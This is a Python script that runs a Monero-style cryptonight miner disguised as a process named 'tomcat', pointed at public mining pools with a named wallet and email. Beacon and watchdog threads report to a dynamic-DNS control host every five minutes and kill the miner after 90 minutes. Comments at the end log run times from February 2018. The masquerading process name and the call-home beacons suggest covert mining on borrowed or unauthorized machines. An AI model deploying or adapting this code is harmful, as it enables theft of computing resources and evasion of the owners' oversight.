import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:05.255622
#2018-02-17 17:37:07.094305
#2018-02-17 19:26:06.204784
#2018-02-17 21:17:03.389507
#2018-02-17 23:01:04.068791
#2018-02-18 00:48:01.731213
#2018-02-18 02:38:01.895210
#2018-02-18 04:26:03.892705
#2018-02-18 06:17:05.671903
#2018-02-18 08:07:07.309233
#2018-02-18 09:55:06.843739
#2018-02-18 11:42:07.613916
#2018-02-18 13:27:01.645665
#2018-02-18 15:17:07.589330
#2018-02-18 17:05:09.036619
#2018-02-18 18:52:04.465677
#2018-02-18 20:39:04.032305
#2018-02-18 22:25:08.409119
#2018-02-19 00:15:01.430774
#2018-02-19 02:01:05.556230
#2018-02-19 03:48:07.566199
#2018-02-19 05:32:05.710652
#2018-02-19 07:20:01.495439
#2018-02-19 09:09:01.922163
#2018-02-19 10:58:06.277173
#2018-02-19 12:47:01.366135
#2018-02-19 14:36:01.518320
#2018-02-19 16:23:01.516612
#2018-02-19 18:10:04.217389
#2018-02-19 19:56:03.783100
#2018-02-19 21:43:01.252497
#2018-02-19 23:29:07.549961
#2018-02-20 01:16:06.476807
#2018-02-20 03:06:06.236616
#2018-02-20 04:53:01.820756
#2018-02-20 06:36:07.804197
#2018-02-20 08:21:04.454963
#2018-02-20 10:06:06.047272
#2018-02-20 11:50:05.324869
#2018-02-20 13:38:01.508668
#2018-02-20 15:21:10.103094
#2018-02-20 17:06:08.522907
#2018-02-20 18:53:04.871808
#2018-02-20 20:42:08.057129
#2018-02-20 22:28:06.342954
#2018-02-21 00:10:07.635517
#2018-02-21 01:56:06.255155
#2018-02-21 03:46:04.309679
#2018-02-21 05:36:04.493584
#2018-02-21 07:23:17.356701
#2018-02-21 09:07:05.965380
#2018-02-21 10:56:07.832835
#2018-02-21 12:43:08.662493
#2018-02-21 14:30:05.180815
#2018-02-21 16:17:04.830587
#2018-02-21 18:07:01.373903
#2018-02-21 19:52:08.440920
#2018-02-21 21:40:08.576170
#2018-02-21 23:27:06.863682
#2018-02-22 01:15:01.541108
#2018-02-22 03:06:01.841870
#2018-02-22 04:50:06.439234
#2018-02-22 06:35:09.139841
#2018-02-22 08:23:06.829847
#2018-02-22 10:10:05.534935
#2018-02-22 11:56:07.581418
#2018-02-22 13:43:04.578745
#2018-02-22 15:30:10.544432
#2018-02-22 17:16:05.124637
#2018-02-22 19:02:02.223943
#2018-02-22 20:53:05.447235
#2018-02-22 22:38:07.158679
#2018-02-23 00:24:05.295263
#2018-02-23 02:12:07.646414
#2018-02-23 03:58:07.974010
#2018-02-23 05:46:01.467223
#2018-02-23 07:29:01.644827
#2018-02-23 09:34:06.768044
#2018-02-23 11:39:07.377027
#2018-02-23 13:28:04.898302
#2018-02-23 15:13:09.072418
#2018-02-23 17:03:11.580983
#2018-02-23 18:51:11.688004
#2018-02-23 20:37:01.330967
#2018-02-23 22:24:07.669014
#2018-02-24 00:11:03.695140
#2018-02-24 02:02:02.026787
#2018-02-24 03:52:01.397156
#2018-02-24 05:38:01.514488
#2018-02-24 07:24:07.231780
#2018-02-24 09:14:01.642337
#2018-02-24 11:14:01.431701
#2018-02-24 13:03:06.504912
#2018-02-24 14:51:04.991440
#2018-02-24 16:43:01.298276
#2018-02-24 18:32:04.524894
#2018-02-24 20:18:07.303858
#2018-02-24 22:12:05.859157
#2018-02-25 02:28:05.246853
#2018-02-25 06:07:05.368593
#2018-02-25 11:38:05.337368